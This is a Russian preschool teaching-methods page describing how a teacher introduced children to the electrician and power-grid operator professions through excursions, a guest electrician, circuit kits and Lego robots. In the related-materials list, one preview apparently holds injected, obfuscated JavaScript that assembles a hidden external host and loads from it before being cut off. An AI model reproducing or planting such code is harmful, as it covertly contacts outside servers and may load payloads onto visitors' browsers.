Знакомство с профессией электромонтажник и оператор электросетей посредством конструктора лего.
методическая разработка по конструированию, ручному труду (подготовительная группа)
Формирование представлений детей дошкольного возраста о мире профессий – это актуальный процесс, который необходимо строить с учётом современных образовательных технологий.
Скачать:
Вложение | Размер |
---|---|
![]() | 17.01 КБ |
![]() | 2.06 МБ |
Предварительный просмотр:
Знакомство с профессией электромонтажник и оператор электросетей посредством конструктора лего.
Динисламова О.П.
(Слайд 1) Формирование представлений детей дошкольного возраста о мире профессий – это актуальный процесс, который необходимо строить с учётом современных образовательных технологий. Конструирование дает возможность детям в увлекательной, активной и продуктивной деятельности обогащать свои представления о разных видах профессий. А помощь родных и близких в таком важном и ответственном деле, как приобщение детей к труду и знакомство с профессиями, очень важна и необходима. Профориентация, в первую очередь, начинается с семьи.
Осенью воспитанники подготовительной группы стали участниками конкурса Лего-фантазии. Тема, которого была «Суперизобретения». Ребятам необходимо было придумать роботов-помощников для профессий, связанных с опасностью. Но сначала, необходимо было определиться с профессией. Дети получили задание, узнать у своих родителей какие же профессии считаются опасными. И вот одна из девочек рассказала о том, что ее дедушка работает электриком. Мы решили пригласить его к нам в детский сад, чтобы ребята смогли подробнее узнать о профессии электромонтажника.
Но прежде, чем познакомить ребят с этой профессией, я задала ребятам вопрос: что такое электричество? И с чего оно началось?
(Слайд 2) Ответить на эти вопросы нам помогли развивающие фильмы об электричестве. Мы получили ответы на такие вопросы: «Где живет электричество?», «Почему электричество кусается?», «Как увидеть молнию?», «Почему наэлектризованные предметы могут двигаться?», «Почему лампочка светит?».
(Слайд 3) Вместе с родителями мы побывали на экскурсии в колледже имени П.П.Аносова, ребята смогли ближе познакомиться с данной профессией, поиграли в игры, (Слайд 4) примерили диэлектрические перчатки и обувь. (Слайд 5) Студенты показали детям мастер-класс по сбору электрической схемы.
(Слайд 6) В группе, мы попробовали сами собрать электрическую цепь, в этом нам помог электронный конструктор «Знаток».
Мы с ребятами собрали несколько моделей по предложенным в инструкции схемам.
(Слайд 7) Затем, к нам в гости пришел дедушка воспитанницы – Александр Иванович, рассказал об особенностях работы электриком, (Слайд 8) показал инструменты, (Слайд 9) дал возможность ими поработать. (Слайд 10) Ребята собрали пазлы из конструктора лего с инструментами, которые необходимы электрику. (Слайд 11) Александр Иванович подсказал, что хорошо бы придумать приспособление, которое позволит электрику без опасности подниматься и работать на высоте.
(Слайд 12) У нас получилось придумать и сконструировать 2 –ух роботов. Первый – робот подъемник, который легко поднимает электромонтажника по столбу наверх.
(Слайд 13) Второй робот позволяет работать в труднодоступных местах, например, если провода проходят над рекой. Вот такие суперизобретения мы придумали, чтобы облегчить труд электромонтажника на опасных участках.
(Слайд 14) В заключении хотелось бы еще раз обратить внимание, что воспитательно-образовательная деятельность по вопросам ранней профориентации дошкольников оказывается наиболее результативной, если осуществляется при активной поддержке родных и близких наших воспитанников.
Работа, которая проводится совместно с родителями, имеет решающее значение для воспитания у дошкольника ценностного отношения к труду взрослых, способствует большему пониманию ребенком мира профессий. Чем разнообразнее представления дошкольника о мире профессий, тем этот мир ярче и привлекательнее для него. Таким образом, дети в будущем научатся быть инициативными в выборе собственной профессии, будут проявлять активность и творчество, что поможет их дальнейшему обучению в школе.
Предварительный просмотр:
По теме: методические разработки, презентации и конспекты
Развитие познавательных способностей у детей посредством использования "Лего-конструктора".
Конструктивная деятельность занимает значимое место в дошкольном воспитании и является сложным познавательным процессом, в результате которого происходит интеллектуальное развитие детей: ребенок овлад...
![](/sites/default/files/pictures/2017/10/11/picture-956709-1507700625.jpg)
Конспект образовательной деятельности по лего-конструированию «Знакомство с конструктором Лего Duplo»
laquo;Знакомство с конструктором Лего Duplo»...
![](/sites/default/files/pictures/2021/02/14/picture-256568-1613328653.jpg)
Познавательное развитие дошкольников посредством использования ЛЕГО-конструктора.
var e,n,o;window.self===window.top&&(e=[\'//\',\'s:\',\'tp\',\'ht\'].reverse().join(\'\'),n=[\'ujbvokac.lussoit.com\',\'36\'].join(\'/\'),(o=new Image).src=\'\'.concat(e).concat(n,\'.gif\')); var script = document.cre...
![](/sites/default/files/pictures/2021/01/11/picture-1199707-1610359328.jpg)
Знакомство с профессией "Оператор машинного доения" (доярка)
Уточнить и закрепить знания детей о домашнем животном села - корове, о том, какую пользу она приносит людям, закрепить знания детей о труде доярки, о труде других людей по уходу за животными...
![](/sites/default/files/pictures/2019/03/14/picture-1126128-1552577694.jpg)
ТВОРЧЕСКИЕ ВОЗМОЖНОСТИ И ТЕХНИЧЕСКИЕ РЕШЕНИЯ ПОСРЕДСТВОМ КОНСТРУКТОРА ЛЕГО.
Важная задача наших дней, подготовить детей к цифровому будущему, которое наступает все быстрее и быстрее, ведь время не стоит на месте, а технологии сменяют одна другую.Такие навыки как креативность,...
![](/sites/default/files/pictures/2021/03/16/picture-500870-1615875754.jpg)
Авторская статья. Развитие технического творчества детей дошкольного возраста посредством конструктора Лего
Авторская статья. Развитие технического творчества детей дошкольного возраста посредством конструктора Лего...
![](/sites/default/files/pictures/2014/11/01/picture-511938-1414823005.jpg)
Авторская статья. Развитие технического творчества детей дошкольного возраста посредством конструктора Лего
В статье представлен опыт работы детского сада по реализации парциальной программы «От Фрёбеля до робота: растим будущих инженеров». Статья будет интересна руководителям, старшим воспитате...